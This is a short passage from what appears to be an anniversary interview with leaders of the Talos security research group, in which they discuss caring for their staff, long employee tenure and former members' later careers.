**Marshall:** I stand by the idea that if I take care of my people, my people take care of me. That’s something I ask of all my managers — just take care of your people. The No. 2 thing I ask is to meet the needs of the business. 

**Watchinski:** A lot of people in this organization have been with me for 5,10,15 even 20 years. They’ve gone from junior analyst to senior director inside a Fortune 500 company. And even when you look at all the folks that have left the organization over the years, they've all gone on to do great things. 

**Marshall:** No matter what, I want people to be better for their time spent with us. And if they exit tomorrow but they’ve accomplished that, then we’ve done our job. 

**Brad:** People who have moved on from Talos have said to me, “The Talos years are some of the best years of my career.” To me, that’s worth protecting. 

For more Talos 10 celebrations, take a look at some our key moments: